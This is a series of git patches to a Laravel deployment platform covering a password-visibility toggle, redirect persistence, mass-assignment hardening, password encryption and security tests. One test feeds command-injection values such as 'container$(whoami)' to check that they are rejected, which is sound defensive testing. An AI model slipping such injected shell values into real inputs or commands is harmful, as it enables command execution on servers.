                 @if ($allowToPeak)
-                    <div x-on:click="changePasswordFieldType"
-                        class="absolute inset-y-0 right-0 flex items-center h-6 pt-2 pr-2 cursor-pointer dark:hover:text-white">
-                        <svg xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+                    <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
+                        class="absolute inset-y-0 right-0 flex items-center h-6 pt-2 pr-2 cursor-pointer dark:hover:text-white"
+                        aria-label="Toggle password visibility">
+                        <svg x-show="type === 'password'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
                             stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
                             <path stroke="none" d="M0 0h24v24H0z" fill="none" />
                             <path d="M10 12a2 2 0 1 0 4 0a2 2 0 0 0 -4 0" />
                             <path
                                 d="M21 12c-2.4 4 -5.4 6 -9 6c-3.6 0 -6.6 -2 -9 -6c2.4 -4 5.4 -6 9 -6c3.6 0 6.6 2 9 6" />
                         </svg>
-                    </div>
+                        <svg x-cloak x-show="type === 'text'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+                            stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
+                            <path stroke="none" d="M0 0h24v24H0z" fill="none" />
+                            <path d="M10.585 10.587a2 2 0 0 0 2.829 2.828" />
+                            <path d="M16.681 16.673a8.717 8.717 0 0 1 -4.681 1.327c-3.6 0 -6.6 -2 -9 -6c1.272 -2.12 2.712 -3.678 4.32 -4.674m2.86 -1.146a9.055 9.055 0 0 1 1.82 -.18c3.6 0 6.6 2 9 6c-.666 1.11 -1.379 2.067 -2.138 2.87" />
+                            <path d="M3 3l18 18" />
+                        </svg>
+                    </button>
                 @endif
                 <input x-cloak x-show="type === 'password'" value="{{ $value }}"
                     {{ $attributes->merge(['class' => $defaultClassInput]) }} @required($required)
diff --git a/resources/views/layouts/base.blade.php b/resources/views/layouts/base.blade.php
index 2b4ca6054..33968ee32 100644
--- a/resources/views/layouts/base.blade.php
+++ b/resources/views/layouts/base.blade.php
@@ -203,30 +203,6 @@ function checkTheme() {
         let checkHealthInterval = null;
         let checkIfIamDeadInterval = null;
 
-        function changePasswordFieldType(event) {
-            let element = event.target
-            for (let i = 0; i < 10; i++) {
-                if (element.className === "relative") {
-                    break;
-                }
-                element = element.parentElement;
-            }
-            element = element.children[1];
-            if (element.nodeName === 'INPUT' || element.nodeName === 'TEXTAREA') {
-                if (element.type === 'password') {
-                    element.type = 'text';
-                    if (element.disabled) return;
-                    element.classList.add('truncate');
-                    this.type = 'text';
-                } else {
-                    element.type = 'password';
-                    if (element.disabled) return;
-                    element.classList.remove('truncate');
-                    this.type = 'password';
-                }
-            }
-        }
-
         function copyToClipboard(text) {
             navigator?.clipboard?.writeText(text) && window.Livewire.dispatch('success', 'Copied to clipboard.');
         }
@@ -326,4 +302,4 @@ function copyToClipboard(text) {
 </body>
 @show
 
-</html>
\ No newline at end of file
+</html>
diff --git a/tests/Feature/PasswordVisibilityComponentTest.php b/tests/Feature/PasswordVisibilityComponentTest.php
new file mode 100644
index 000000000..efc0e27cf
--- /dev/null
+++ b/tests/Feature/PasswordVisibilityComponentTest.php
@@ -0,0 +1,41 @@
+<?php
+
+use Illuminate\Support\MessageBag;
+use Illuminate\Support\ViewErrorBag;
+
+beforeEach(function () {
+    $errors = new ViewErrorBag;
+    $errors->put('default', new MessageBag);
+    view()->share('errors', $errors);
+});
+
+it('renders password input with Alpine-managed visibility state', function () {
+    $html = Blade::render('<x-forms.input type="password" id="secret" />');
+
+    expect($html)
+        ->toContain('@success.window="type = \'password\'"')
+        ->toContain("x-data=\"{ type: 'password' }\"")
+        ->toContain("x-on:click=\"type = type === 'password' ? 'text' : 'password'\"")
+        ->toContain('x-bind:type="type"')
+        ->toContain("x-bind:class=\"{ 'truncate': type === 'text' && ! \$el.disabled }\"")
+        ->not->toContain('changePasswordFieldType');
+});
+
+it('renders password textarea with Alpine-managed visibility state', function () {
+    $html = Blade::render('<x-forms.textarea type="password" id="secret" />');
+
+    expect($html)
+        ->toContain('@success.window="type = \'password\'"')
+        ->toContain("x-data=\"{ type: 'password' }\"")
+        ->toContain("x-on:click=\"type = type === 'password' ? 'text' : 'password'\"")
+        ->not->toContain('changePasswordFieldType');
+});
+
+it('resets password visibility on success event for env-var-input', function () {
+    $html = Blade::render('<x-forms.env-var-input type="password" id="secret" />');
+
+    expect($html)
+        ->toContain("@success.window=\"type = 'password'\"")
+        ->toContain("x-on:click=\"type = type === 'password' ? 'text' : 'password'\"")
+        ->toContain('x-bind:type="type"');
+});

From 3fde1e0f9f74f44dd5f0620e1f5db17d9ca0c35f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 29 Mar 2026 20:50:03 +0200
Subject: [PATCH 194/213] fix(application): persist redirect value in
 setRedirect

Assign the selected redirect option before validation so valid changes are saved.
Add feature tests to verify redirect persistence and rejection when no www domain exists.
---
 app/Livewire/Project/Application/General.php |  1 +
 tests/Feature/ApplicationRedirectTest.php    | 60 ++++++++++++++++++++
 2 files changed, 61 insertions(+)
 create mode 100644 tests/Feature/ApplicationRedirectTest.php

diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index c12fec76a..6fd063cf3 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -735,6 +735,7 @@ public function setRedirect()
         $this->authorize('update', $this->application);
 
         try {
+            $this->application->redirect = $this->redirect;
             $has_www = collect($this->application->fqdns)->filter(fn ($fqdn) => str($fqdn)->contains('www.'))->count();
             if ($has_www === 0 && $this->application->redirect === 'www') {
                 $this->dispatch('error', 'You want to redirect to www, but you do not have a www domain set.<br><br>Please add www to your domain list and as an A DNS record (if applicable).');
diff --git a/tests/Feature/ApplicationRedirectTest.php b/tests/Feature/ApplicationRedirectTest.php
new file mode 100644
index 000000000..55b124f81
--- /dev/null
+++ b/tests/Feature/ApplicationRedirectTest.php
@@ -0,0 +1,60 @@
+<?php
+
+use App\Livewire\Project\Application\General;
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+describe('Application Redirect', function () {
+    test('setRedirect persists the redirect value to the database', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'fqdn' => 'https://example.com,https://www.example.com',
+            'redirect' => 'both',
+        ]);
+
+        Livewire::test(General::class, ['application' => $application])
+            ->assertSuccessful()
+            ->set('redirect', 'www')
+            ->call('setRedirect')
+            ->assertDispatched('success');
+
+        $application->refresh();
+        expect($application->redirect)->toBe('www');
+    });
+
+    test('setRedirect rejects www redirect when no www domain exists', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'fqdn' => 'https://example.com',
+            'redirect' => 'both',
+        ]);
+
+        Livewire::test(General::class, ['application' => $application])
+            ->assertSuccessful()
+            ->set('redirect', 'www')
+            ->call('setRedirect')
+            ->assertDispatched('error');
+
+        $application->refresh();
+        expect($application->redirect)->toBe('both');
+    });
+});

From b3256d4df14e21c6d8936d972f45cbc47e07cca4 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 29 Mar 2026 20:56:04 +0200
Subject: [PATCH 195/213] fix(security): harden model assignment and sensitive
 data handling

Restrict mass-assignable attributes across user/team/redis models and
switch privileged root/team creation paths to forceFill/forceCreate.

Encrypt legacy ClickHouse admin passwords via migration and cast the
correct ClickHouse password field as encrypted.

Tighten API and runtime exposure by removing sensitive team fields from
responses and sanitizing Git/compose error messages.

Expand security-focused feature coverage for command-injection and mass
assignment protections.
---
 app/Actions/Fortify/CreateNewUser.php         |   3 +-
 app/Http/Controllers/Api/TeamController.php   |   8 --
 app/Models/Application.php                    |   4 +-
 app/Models/ServerSetting.php                  |   1 +
 app/Models/StandaloneClickhouse.php           |   2 +-
 app/Models/StandaloneRedis.php                |   1 -
 app/Models/Team.php                           |   3 +-
 app/Models/User.php                           |  11 +-
 ...pt_existing_clickhouse_admin_passwords.php |  39 ++++++
 database/seeders/RootUserSeeder.php           |   3 +-
 tests/Feature/GetLogsCommandInjectionTest.php | 120 +++++++++++++-----
 .../Feature/MassAssignmentProtectionTest.php  |  18 ++-
 12 files changed, 154 insertions(+), 59 deletions(-)
 create mode 100644 database/migrations/2026_03_29_000000_encrypt_existing_clickhouse_admin_passwords.php

diff --git a/app/Actions/Fortify/CreateNewUser.php b/app/Actions/Fortify/CreateNewUser.php
index 9f97dd0d4..7ea6a871e 100644
--- a/app/Actions/Fortify/CreateNewUser.php
+++ b/app/Actions/Fortify/CreateNewUser.php
@@ -37,12 +37,13 @@ public function create(array $input): User
         if (User::count() == 0) {
             // If this is the first user, make them the root user
             // Team is already created in the database/seeders/ProductionSeeder.php
-            $user = User::create([
+            $user = (new User)->forceFill([
                 'id' => 0,
                 'name' => $input['name'],
                 'email' => $input['email'],
                 'password' => Hash::make($input['password']),
             ]);
+            $user->save();
             $team = $user->teams()->first();
 
             // Disable registration after first user is created
diff --git a/app/Http/Controllers/Api/TeamController.php b/app/Http/Controllers/Api/TeamController.php
index fd0282d96..03b36e4e0 100644
--- a/app/Http/Controllers/Api/TeamController.php
+++ b/app/Http/Controllers/Api/TeamController.php
@@ -14,14 +14,6 @@ private function removeSensitiveData($team)
             'custom_server_limit',
             'pivot',
         ]);
-        if (request()->attributes->get('can_read_sensitive', false) === false) {
-            $team->makeHidden([
-                'smtp_username',
-                'smtp_password',
-                'resend_api_key',
-                'telegram_token',
-            ]);
-        }
 
         return serializeApiResponse($team);
     }
diff --git a/app/Models/Application.php b/app/Models/Application.php
index a4789ae4a..3312f4c76 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1767,7 +1767,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
         $fileList = collect([".$workdir$composeFile"]);
         $gitRemoteStatus = $this->getGitRemoteStatus(deployment_uuid: $uuid);
         if (! $gitRemoteStatus['is_accessible']) {
-            throw new RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
+            throw new RuntimeException('Failed to read Git source. Please verify repository access and try again.');
         }
         $getGitVersion = instant_remote_process(['git --version'], $this->destination->server, false);
         $gitVersion = str($getGitVersion)->explode(' ')->last();
@@ -1825,7 +1825,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
                 }
                 throw new RuntimeException('Repository does not exist. Please check your repository URL and try again.');
             }
-            throw new RuntimeException($e->getMessage());
+            throw new RuntimeException('Failed to read the Docker Compose file from the repository.');
         } finally {
             // Cleanup only - restoration happens in catch block
             $commands = collect([
diff --git a/app/Models/ServerSetting.php b/app/Models/ServerSetting.php
index 504cfa60a..efc7bc8de 100644
--- a/app/Models/ServerSetting.php
+++ b/app/Models/ServerSetting.php
@@ -56,6 +56,7 @@ class ServerSetting extends Model
     protected $guarded = [];
 
     protected $casts = [
+        'force_disabled' => 'boolean',
         'force_docker_cleanup' => 'boolean',
         'docker_cleanup_threshold' => 'integer',
         'sentinel_token' => 'encrypted',
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 74382d87c..c192e5360 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -42,7 +42,7 @@ class StandaloneClickhouse extends BaseModel
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
-        'clickhouse_password' => 'encrypted',
+        'clickhouse_admin_password' => 'encrypted',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
         'last_restart_at' => 'datetime',
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 812a0e5cb..2320619cf 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -16,7 +16,6 @@ class StandaloneRedis extends BaseModel
     protected $fillable = [
         'name',
         'description',
-        'redis_password',
         'redis_conf',
         'status',
         'image',
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 4b9751706..8eb8fa050 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -43,10 +43,9 @@ class Team extends Model implements SendsDiscord, SendsEmail, SendsPushover, Sen
     protected $fillable = [
         'name',
         'description',
+        'personal_team',
         'show_boarding',
         'custom_server_limit',
-        'use_instance_email_settings',
-        'resend_api_key',
     ];
 
     protected $casts = [
diff --git a/app/Models/User.php b/app/Models/User.php
index 6b6f93239..a62cb8358 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -49,9 +49,6 @@ class User extends Authenticatable implements SendsEmail
         'password',
         'force_password_reset',
         'marketing_emails',
-        'pending_email',
-        'email_change_code',
-        'email_change_code_expires_at',
     ];
 
     protected $hidden = [
@@ -98,7 +95,7 @@ protected static function boot()
                 $team['id'] = 0;
                 $team['name'] = 'Root Team';
             }
-            $new_team = Team::create($team);
+            $new_team = Team::forceCreate($team);
             $user->teams()->attach($new_team, ['role' => 'owner']);
         });
 
@@ -201,7 +198,7 @@ public function recreate_personal_team()
             $team['id'] = 0;
             $team['name'] = 'Root Team';
         }
-        $new_team = Team::create($team);
+        $new_team = Team::forceCreate($team);
         $this->teams()->attach($new_team, ['role' => 'owner']);
 
         return $new_team;
@@ -412,11 +409,11 @@ public function requestEmailChange(string $newEmail): void
         $expiryMinutes = config('constants.email_change.verification_code_expiry_minutes', 10);
         $expiresAt = Carbon::now()->addMinutes($expiryMinutes);
 
-        $this->update([
+        $this->forceFill([
             'pending_email' => $newEmail,
             'email_change_code' => $code,
             'email_change_code_expires_at' => $expiresAt,
-        ]);
+        ])->save();
 
         // Send verification email to new address
         $this->notify(new EmailChangeVerification($this, $code, $newEmail, $expiresAt));
diff --git a/database/migrations/2026_03_29_000000_encrypt_existing_clickhouse_admin_passwords.php b/database/migrations/2026_03_29_000000_encrypt_existing_clickhouse_admin_passwords.php
new file mode 100644
index 000000000..a4a6988f2
--- /dev/null
+++ b/database/migrations/2026_03_29_000000_encrypt_existing_clickhouse_admin_passwords.php
@@ -0,0 +1,39 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Support\Facades\Crypt;
+use Illuminate\Support\Facades\DB;
+
+class EncryptExistingClickhouseAdminPasswords extends Migration
+{
+    public function up(): void
+    {
+        try {
+            DB::table('standalone_clickhouses')->chunkById(100, function ($clickhouses) {
+                foreach ($clickhouses as $clickhouse) {
+                    $password = $clickhouse->clickhouse_admin_password;
+
+                    if (empty($password)) {
+                        continue;
+                    }
+
+                    // Skip if already encrypted (idempotent)
+                    try {
+                        Crypt::decryptString($password);
+
+                        continue;
+                    } catch (Exception) {
+                        // Not encrypted yet — encrypt it
+                    }
+
+                    DB::table('standalone_clickhouses')
+                        ->where('id', $clickhouse->id)
+                        ->update(['clickhouse_admin_password' => Crypt::encryptString($password)]);
+                }
+            });
+        } catch (Exception $e) {
+            echo 'Encrypting ClickHouse admin passwords failed.';
+            echo $e->getMessage();
+        }
+    }
+}
diff --git a/database/seeders/RootUserSeeder.php b/database/seeders/RootUserSeeder.php
index e3968a1c9..c4e93af63 100644
--- a/database/seeders/RootUserSeeder.php
+++ b/database/seeders/RootUserSeeder.php
@@ -45,12 +45,13 @@ public function run(): void
             }
 
             try {
-                User::create([
+                $user = (new User)->forceFill([
                     'id' => 0,
                     'name' => env('ROOT_USERNAME', 'Root User'),
                     'email' => env('ROOT_USER_EMAIL'),
                     'password' => Hash::make(env('ROOT_USER_PASSWORD')),
                 ]);
+                $user->save();
                 echo "\n  SUCCESS  Root user created successfully.\n\n";
             } catch (\Exception $e) {
                 echo "\n  ERROR  Failed to create root user: {$e->getMessage()}\n\n";
diff --git a/tests/Feature/GetLogsCommandInjectionTest.php b/tests/Feature/GetLogsCommandInjectionTest.php
index 34824b48b..3e5a33b66 100644
--- a/tests/Feature/GetLogsCommandInjectionTest.php
+++ b/tests/Feature/GetLogsCommandInjectionTest.php
@@ -1,8 +1,40 @@
 <?php
 
 use App\Livewire\Project\Shared\GetLogs;
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
 use App\Support\ValidationPatterns;
+use Illuminate\Foundation\Testing\RefreshDatabase;
 use Livewire\Attributes\Locked;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $this->user->teams()->attach($this->team, ['role' => 'owner']);
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    // Server::created auto-creates a StandaloneDocker, reuse it
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+});
 
 describe('GetLogs locked properties', function () {
     test('container property has Locked attribute', function () {
@@ -34,47 +66,67 @@
     });
 });
 
-describe('GetLogs container name validation in getLogs', function () {
-    test('getLogs method validates container name with ValidationPatterns', function () {
-        $method = new ReflectionMethod(GetLogs::class, 'getLogs');
-        $startLine = $method->getStartLine();
-        $endLine = $method->getEndLine();
-        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
-        $methodBody = implode('', $lines);
+describe('GetLogs Livewire action validation', function () {
+    test('getLogs rejects invalid container name', function () {
+        // Make server functional by setting settings directly
+        $this->server->settings->forceFill([
+            'is_reachable' => true,
+            'is_usable' => true,
+            'force_disabled' => false,
+        ])->save();
+        // Reload server with fresh settings to ensure casted values
+        $server = Server::with('settings')->find($this->server->id);
 
-        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+        Livewire::test(GetLogs::class, [
+            'server' => $server,
+            'resource' => $this->application,
+            'container' => 'container;malicious-command',
+        ])
+            ->call('getLogs')
+            ->assertSet('outputs', 'Invalid container name.');
     });
 
-    test('downloadAllLogs method validates container name with ValidationPatterns', function () {
-        $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
-        $startLine = $method->getStartLine();
-        $endLine = $method->getEndLine();
-        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
-        $methodBody = implode('', $lines);
+    test('getLogs rejects unauthorized server access', function () {
+        $otherTeam = Team::factory()->create();
+        $otherServer = Server::factory()->create(['team_id' => $otherTeam->id]);
 
-        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
-    });
-});
-
-describe('GetLogs authorization checks', function () {
-    test('getLogs method checks server ownership via ownedByCurrentTeam', function () {
-        $method = new ReflectionMethod(GetLogs::class, 'getLogs');
-        $startLine = $method->getStartLine();
-        $endLine = $method->getEndLine();
-        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
-        $methodBody = implode('', $lines);
-
-        expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+        Livewire::test(GetLogs::class, [
+            'server' => $otherServer,
+            'resource' => $this->application,
+            'container' => 'test-container',
+        ])
+            ->call('getLogs')
+            ->assertSet('outputs', 'Unauthorized.');
     });
 
-    test('downloadAllLogs method checks server ownership via ownedByCurrentTeam', function () {
-        $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
-        $startLine = $method->getStartLine();
-        $endLine = $method->getEndLine();
-        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
-        $methodBody = implode('', $lines);
+    test('downloadAllLogs returns empty for invalid container name', function () {
+        $this->server->settings->forceFill([
+            'is_reachable' => true,
+            'is_usable' => true,
+            'force_disabled' => false,
+        ])->save();
+        $server = Server::with('settings')->find($this->server->id);
 
-        expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+        Livewire::test(GetLogs::class, [
+            'server' => $server,
+            'resource' => $this->application,
+            'container' => 'container$(whoami)',
+        ])
+            ->call('downloadAllLogs')
+            ->assertReturned('');
+    });
+
+    test('downloadAllLogs returns empty for unauthorized server', function () {
+        $otherTeam = Team::factory()->create();
+        $otherServer = Server::factory()->create(['team_id' => $otherTeam->id]);
+
+        Livewire::test(GetLogs::class, [
+            'server' => $otherServer,
+            'resource' => $this->application,
+            'container' => 'test-container',
+        ])
+            ->call('downloadAllLogs')
+            ->assertReturned('');
     });
 });
 
diff --git a/tests/Feature/MassAssignmentProtectionTest.php b/tests/Feature/MassAssignmentProtectionTest.php
index f6518648f..18de67ce7 100644
--- a/tests/Feature/MassAssignmentProtectionTest.php
+++ b/tests/Feature/MassAssignmentProtectionTest.php
@@ -96,6 +96,9 @@
         expect($user->isFillable('remember_token'))->toBeFalse('remember_token should not be fillable');
         expect($user->isFillable('two_factor_secret'))->toBeFalse('two_factor_secret should not be fillable');
         expect($user->isFillable('two_factor_recovery_codes'))->toBeFalse('two_factor_recovery_codes should not be fillable');
+        expect($user->isFillable('pending_email'))->toBeFalse('pending_email should not be fillable');
+        expect($user->isFillable('email_change_code'))->toBeFalse('email_change_code should not be fillable');
+        expect($user->isFillable('email_change_code_expires_at'))->toBeFalse('email_change_code_expires_at should not be fillable');
     });
 
     test('User model allows mass assignment of profile fields', function () {
@@ -110,7 +113,18 @@
         $team = new Team;
 
         expect($team->isFillable('id'))->toBeFalse();
-        expect($team->isFillable('personal_team'))->toBeFalse('personal_team should not be fillable');
+        expect($team->isFillable('use_instance_email_settings'))->toBeFalse('use_instance_email_settings should not be fillable (migrated to EmailNotificationSettings)');
+        expect($team->isFillable('resend_api_key'))->toBeFalse('resend_api_key should not be fillable (migrated to EmailNotificationSettings)');
+    });
+
+    test('Team model allows mass assignment of expected fields', function () {
+        $team = new Team;
+
+        expect($team->isFillable('name'))->toBeTrue();
+        expect($team->isFillable('description'))->toBeTrue();
+        expect($team->isFillable('personal_team'))->toBeTrue();
+        expect($team->isFillable('show_boarding'))->toBeTrue();
+        expect($team->isFillable('custom_server_limit'))->toBeTrue();
     });
 
     test('standalone database models block mass assignment of relationship IDs', function () {
@@ -145,7 +159,7 @@
         expect($model->isFillable('limits_memory'))->toBeTrue();
 
         $model = new StandaloneRedis;
-        expect($model->isFillable('redis_password'))->toBeTrue();
+        expect($model->isFillable('redis_conf'))->toBeTrue();
 
         $model = new StandaloneMysql;
         expect($model->isFillable('mysql_root_password'))->toBeTrue();

From 9f46586d4aaa93f2b526d67833ba70ef58b9893e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 29 Mar 2026 21:25:41 +0200
Subject: [PATCH 196/213] refactor: define explicit fillable attributes on all
 Eloquent models

Replace $guarded usage with explicit $fillable arrays across all models.
Sync fillable definitions with current database schema and add tests.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 .../Api/ApplicationsController.php            |  14 +-
 .../Controllers/Api/DatabasesController.php   |  16 +-
 .../Controllers/Api/SecurityController.php    |   7 +-
 app/Livewire/Project/CloneMe.php              |  34 +--
 .../Project/Shared/ResourceOperations.php     |  59 +++--
 app/Models/Application.php                    | 108 +++++++-
 app/Models/ApplicationDeploymentQueue.php     |  27 +-
 app/Models/ApplicationPreview.php             |  13 +-
 app/Models/ApplicationSetting.php             |  37 ++-
 app/Models/CloudProviderToken.php             |   6 +-
 app/Models/DiscordNotificationSettings.php    |   3 +-
 app/Models/DockerCleanupExecution.php         |   7 +-
 app/Models/EmailNotificationSettings.php      |   4 +
 app/Models/Environment.php                    |   5 +-
 app/Models/GithubApp.php                      |  22 +-
 app/Models/GitlabApp.php                      |  18 ++
 app/Models/InstanceSettings.php               |  38 ++-
 app/Models/LocalFileVolume.php                |  13 +-
 app/Models/LocalPersistentVolume.php          |  10 +-
 app/Models/Project.php                        |   5 +-
 app/Models/ProjectSetting.php                 |   2 +-
 app/Models/PushoverNotificationSettings.php   |   3 +-
 app/Models/S3Storage.php                      |  12 +-
 app/Models/ScheduledDatabaseBackup.php        |  20 +-
 .../ScheduledDatabaseBackupExecution.php      |  12 +-
 app/Models/ScheduledTask.php                  |   9 +-
 app/Models/ScheduledTaskExecution.php         |  10 +-
 app/Models/Server.php                         |   5 +-
 app/Models/ServerSetting.php                  |  45 +++-
 app/Models/Service.php                        |  19 +-
 app/Models/ServiceApplication.php             |  22 +-
 app/Models/ServiceDatabase.php                |  22 +-
 app/Models/SharedEnvironmentVariable.php      |   3 +
 app/Models/SlackNotificationSettings.php      |   3 +-
 app/Models/StandaloneClickhouse.php           |  29 +-
 app/Models/StandaloneDocker.php               |   5 +-
 app/Models/StandaloneDragonfly.php            |  28 +-
 app/Models/StandaloneKeydb.php                |  29 +-
 app/Models/StandaloneMariadb.php              |  31 ++-
 app/Models/StandaloneMongodb.php              |  32 ++-
 app/Models/StandaloneMysql.php                |  33 ++-
 app/Models/StandalonePostgresql.php           |  35 ++-
 app/Models/StandaloneRedis.php                |  28 +-
 app/Models/Subscription.php                   |  13 +-
 app/Models/SwarmDocker.php                    |   5 +-
 app/Models/Tag.php                            |   4 +-
 app/Models/Team.php                           |   7 +-
 app/Models/TelegramNotificationSettings.php   |   6 +-
 app/Models/User.php                           |  19 +-
 bootstrap/helpers/applications.php            |  13 +-
 .../Feature/MassAssignmentProtectionTest.php  | 249 ++++++++++++++++++
 51 files changed, 1071 insertions(+), 128 deletions(-)
 create mode 100644 tests/Feature/MassAssignmentProtectionTest.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index ad1f50ea2..82d662177 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -1158,7 +1158,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
                 $dockerComposeDomains = collect($request->docker_compose_domains);
@@ -1385,7 +1385,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
 
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
@@ -1585,7 +1585,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
 
             $dockerComposeDomainsJson = collect();
             if ($request->has('docker_compose_domains')) {
@@ -1772,7 +1772,7 @@ private function create_application(Request $request, $type)
             }
 
             $application = new Application;
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $application->fqdn = $fqdn;
             $application->ports_exposes = $port;
             $application->build_pack = 'dockerfile';
@@ -1884,7 +1884,7 @@ private function create_application(Request $request, $type)
             $application = new Application;
             removeUnnecessaryFieldsFromRequest($request);
 
-            $application->fill($request->all());
+            $application->fill($request->only($allowedFields));
             $application->fqdn = $fqdn;
             $application->build_pack = 'dockerimage';
             $application->destination_id = $destination->id;
@@ -2000,7 +2000,7 @@ private function create_application(Request $request, $type)
 
             $service = new Service;
             removeUnnecessaryFieldsFromRequest($request);
-            $service->fill($request->all());
+            $service->fill($request->only($allowedFields));
 
             $service->docker_compose_raw = $dockerComposeRaw;
             $service->environment_id = $environment->id;
@@ -2760,7 +2760,7 @@ public function update_by_uuid(Request $request)
 
         removeUnnecessaryFieldsFromRequest($request);
 
-        $data = $request->all();
+        $data = $request->only($allowedFields);
         if ($requestHasDomains && $server->isProxyShouldRun()) {
             data_set($data, 'fqdn', $domains);
         }
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 33d875758..1b5cd0d44 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -1751,7 +1751,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('postgres_conf', $postgresConf);
             }
-            $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1806,7 +1806,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mariadb_conf', $mariadbConf);
             }
-            $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->all());
+            $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->only($allowedFields));
             if ($instantDeploy) {
                 StartDatabase::dispatch($database);
             }
@@ -1865,7 +1865,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 }
                 $request->offsetSet('mysql_conf', $mysqlConf);
             }
-            $database = create_standalone_mysql($environment->id, $destination->uuid, $request->all());
